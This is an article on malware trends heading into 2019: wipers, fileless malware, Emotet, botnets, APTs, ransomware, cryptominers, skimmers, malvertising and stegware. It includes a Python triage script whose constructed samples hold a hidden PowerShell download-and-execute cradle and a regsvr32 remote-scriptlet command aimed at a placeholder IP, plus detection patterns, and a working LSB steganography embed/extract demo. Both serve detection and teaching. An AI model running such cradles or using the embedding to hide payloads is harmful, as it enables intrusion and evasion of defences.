Malware authors continue to innovate, finding new infection vectors and better ways to obfuscate their wares. Heading into 2019, you can count on cybercriminals doing everything in their power to become even more effective and proficient. Here are 10 top malware trends to watch for in the New Year.
Shamoon, Black Energy, Destover, ExPetr/NotPetya and Olympic Destroyer: all of these wipers, and others like them, have the singular purpose of destroying systems and/or data, usually causing great financial and reputational damage to victim companies. The actors behind this kind of code might be bent on sending a political message, carrying out physical sabotage or simply covering their tracks after data exfiltration. Shamoon 3 recently appeared, so wipers will likely continue to be an area to watch in 2019.
Fileless malware infects targeted computers while leaving few or no artifacts on the local hard drive, running instead in memory and through legitimate system tooling, which makes it easy to sidestep traditional signature-based security and forensics tools. Typical attacks exploit vulnerabilities in browsers and associated programs (Java, Flash or PDF readers), or arrive via phishing. Fileless malware attacks nearly doubled in the first half of 2018 alone, according to SentinelOne, and the trend is sure to continue into 2019.
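Because a fileless attack leaves nothing useful for a file scanner to hash, detection has to move to execution telemetry: what was launched, with which arguments, and what an encoded script actually says once decoded. The following is an added example, not code from the original article or from any vendor named in it. It runs simple triage over three constructed process-creation events (the field layout loosely imitates Sysmon Event ID 1 text and is invented for the example), decodes a PowerShell `-EncodedCommand` blob the way PowerShell does (base64 over UTF-16LE), and scores the result. The indicator list, weights and threshold are this example's own assumptions, not a published ruleset.

```python
import base64
import re
from typing import Optional


def encode_ps(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> Optional[str]:
    """Reverse encode_ps(); returns None if the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample script (not a captured payload): a download cradle that never touches disk.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"

# Constructed process-creation events for the example; not real host telemetry.
SAMPLE_EVENTS = [
    r"Image: C:\Windows\System32\notepad.exe CommandLine: notepad.exe C:\Users\alice\notes.txt",
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine: "
    r"powershell.exe -NoP -W Hidden -Enc " + encode_ps(CRADLE),
    r"Image: C:\Windows\System32\regsvr32.exe CommandLine: "
    r"regsvr32.exe /s /n /u /i:http://198.51.100.7/t.sct scrobj.dll",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; capture the base64 that follows it.
ENCODED_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# (name, weight, pattern) checked against the raw command line. Weights are assumptions.
HOST_INDICATORS = [
    ("hidden window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("regsvr32 loading a scriptlet from a URL", 3, re.compile(r"regsvr32\S*.*?/i:https?://", re.I)),
    ("mshta/rundll32 running script or URL", 3,
     re.compile(r"\b(?:mshta|rundll32)\.exe.*?(?:javascript:|vbscript:|https?://)", re.I)),
]

# (name, weight, pattern) checked against the decoded PowerShell script.
SCRIPT_INDICATORS = [
    ("Invoke-Expression", 2, re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("remote download", 2, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("nested base64", 2, re.compile(r"FromBase64String", re.I)),
    ("in-memory assembly/shellcode load", 3, re.compile(r"\[Reflection\.Assembly\]::Load|VirtualAlloc", re.I)),
]

THRESHOLD = 3  # assumed cut-off for this example


def analyze(event: str) -> dict:
    """Score one process-creation event; decoded PowerShell is inspected as well as the raw line."""
    score, findings, decoded = 0, [], None
    for name, weight, rx in HOST_INDICATORS:
        if rx.search(event):
            score += weight
            findings.append(name)
    match = ENCODED_FLAG.search(event)
    if match:
        decoded = decode_ps(match.group(1))
        if decoded is None:
            score += 2
            findings.append("encoded command (undecodable)")
        else:
            score += 1
            findings.append("encoded command")
            for name, weight, rx in SCRIPT_INDICATORS:
                if rx.search(decoded):
                    score += weight
                    findings.append(name)
    return {"score": score, "findings": findings, "decoded": decoded, "suspicious": score >= THRESHOLD}


def triage(events):
    """Apply analyze() to a batch of events."""
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["suspicious"], result["score"], result["findings"])
```

The point of decoding rather than pattern-matching the base64 itself is that the blob changes with every campaign while the decoded cradle (`IEX`, `DownloadString`, `FromBase64String`) is what the attacker cannot easily do without. Script block logging (Event ID 4104) gives the same visibility for scripts that never pass through a command line at all.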
Emotet was once a simple banking trojan, but it has since evolved into a full-scale threat-delivery service, with the ability to leverage third-party, open-source code libraries. It recently added a mass email-harvesting module and macro obfuscation, and it continues to be one of the most prevalent malware families out there. Expect it to keep adding new capabilities in the new year.
In 2018, botnets evolved to target different types of devices, such as carrier-grade MikroTik hardware, and a host of new criminal activity appeared, with botherders building botnet malware with modular architectures to do everything from DDoSing targets to spreading secondary malware. New configurations surfaced, like self-organizing botnet swarms, and law enforcement interest increased. All of these trends are expected to continue into 2019.
Nation-state-backed actors continue to operate from the shadows, making attribution difficult for researchers and staying as stealthy as possible in order to carry out their espionage efforts. Custom malware is very much a part of the APT scene (although a move toward commercial tools has also been spotted), and APTs like Sofacy are actively evolving their code. In 2019, expect APTs to continue to upgrade their bag of tricks to increase the effectiveness of their campaigns.
Attackers behind ransomware incidents are growing more calculating, as we saw in 2018 in the Atlanta ransomware attack and the Onslow Water and Sewer Authority (OWASA) ransomware attack. Experts say the attackers did their homework, picking a ransom figure they knew the victim could afford to pay or, in the case of OWASA, a moment (just after Hurricane Florence hit) when the water utility could least afford downtime.
Cryptominers dominated malware growth in 2018, with attacks increasing by more than 83 percent over the past year according to researchers at Kaspersky Lab, and more than 5 million people attacked with the malware in the first three quarters of 2018. Criminals using this type of malware profited from cryptojacking attacks on the websites of organizations like Make-A-Wish International and the LA Times. With new variants like MassMiner and the Kitty cryptomining malware bursting onto the scene, experts say that cryptominers aren't going anywhere.
Card-skimming malware gained ground over the past year and will continue to do so in 2019, according to researchers at RiskIQ who track the Magecart group, a frequent user of skimmers injected into e-commerce checkout pages. In the past year, 45.8 million records were stolen from in-person transactions via card-skimming malware and point-of-sale (POS) breaches. Threat actors targeted retailers, hotels and restaurants, including Chili's and Cheddar's Scratch Kitchen, both of which suffered payment-card data breaches this year.
Malvertising continues to gain traction as we move into 2019. 2018 saw campaigns with far-reaching consequences: one campaign targeting iOS devices hijacked 300 million browser sessions in just 48 hours, while another posed as a legitimate website publisher on the AdsTerra online advertising network and used the traffic it acquired to redirect victims to exploit kits.
Pushing the Steganography Boundaries
Steganography-based malware, or "stegware," has been gaining traction according to Simon Wiseman, chief technology officer of Deep Secure, as more malware payloads hide from traditional anti-virus protection by being delivered buried inside images, documents or pixel data. In 2018 and moving forward, bad actors are looking to push the limits of stegware by using ever newer carriers: most recently, a new type of malware received its instructions via hidden code embedded in memes posted to Twitter.
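To make the evasion concrete, here is an added example (not code from the article, nor from Deep Secure or any malware it mentions) of the simplest carrier technique in this family: least-significant-bit (LSB) embedding, which hides one payload bit in the lowest bit of each colour channel of an image. The cover "image" is a constructed pseudo-random RGB byte buffer rather than a real PNG, so the block runs without an imaging library; the 4-byte length header, the payload text and the seed are all this example's own choices. It shows why a signature on the original image is useless after embedding (the hash changes) while the picture itself is unchanged to the eye (no channel moves by more than 1 out of 255).

```python
import hashlib
import random

HEADER_BYTES = 4  # assumed layout: 32-bit big-endian payload length, then payload, one bit per cover byte


def _bits(data: bytes):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, payload: bytes) -> bytes:
    """Return a copy of `cover` with `payload` written into the least significant bits."""
    frame = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    needed = len(frame) * 8
    if needed > len(cover):
        raise ValueError(f"cover too small: need {needed} carrier bytes, have {len(cover)}")
    out = bytearray(cover)
    for i, bit in enumerate(_bits(frame)):
        out[i] = (out[i] & 0xFE) | bit  # clear the low bit, then set it to the payload bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Recover a payload written by embed(); raises ValueError if the header is impossible."""
    def read_bytes(offset: int, count: int) -> bytes:
        result = bytearray()
        for b in range(count):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[offset + b * 8 + k] & 1)
            result.append(value)
        return bytes(result)

    length = int.from_bytes(read_bytes(0, HEADER_BYTES), "big")
    if (HEADER_BYTES + length) * 8 > len(stego):
        raise ValueError("length field exceeds carrier size; not a payload written by embed()")
    return read_bytes(HEADER_BYTES * 8, length)


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-byte difference between two equally sized pixel buffers."""
    return max(abs(x - y) for x, y in zip(a, b))


def make_cover(width: int = 64, height: int = 64, seed: int = 1) -> bytes:
    """Constructed stand-in for an RGB image: width*height*3 pseudo-random channel bytes."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(width * height * 3))


def demo() -> dict:
    """Hide a constructed 'instruction' in a cover, recover it, and measure what changed."""
    cover = make_cover()
    payload = b"GET /c2/tasks?id=42"  # constructed text standing in for an operator command
    stego = embed(cover, payload)
    return {
        "recovered": extract(stego),
        "size_same": len(cover) == len(stego),
        "max_delta": max_channel_delta(cover, stego),
        "hash_changed": hashlib.sha256(cover).digest() != hashlib.sha256(stego).digest(),
    }


if __name__ == "__main__":
    print(demo())
```

Two consequences follow for defenders. Hash- or signature-based matching on the image cannot work, because the attacker controls the cover and every stego file is unique; and the payload survives any transport that preserves the pixels exactly, which is why lossless formats and social-media image hosts that do not recompress are attractive carriers. Detection therefore has to look at statistics of the low bits (for LSB) or, more robustly, at what the process that fetched the image does next.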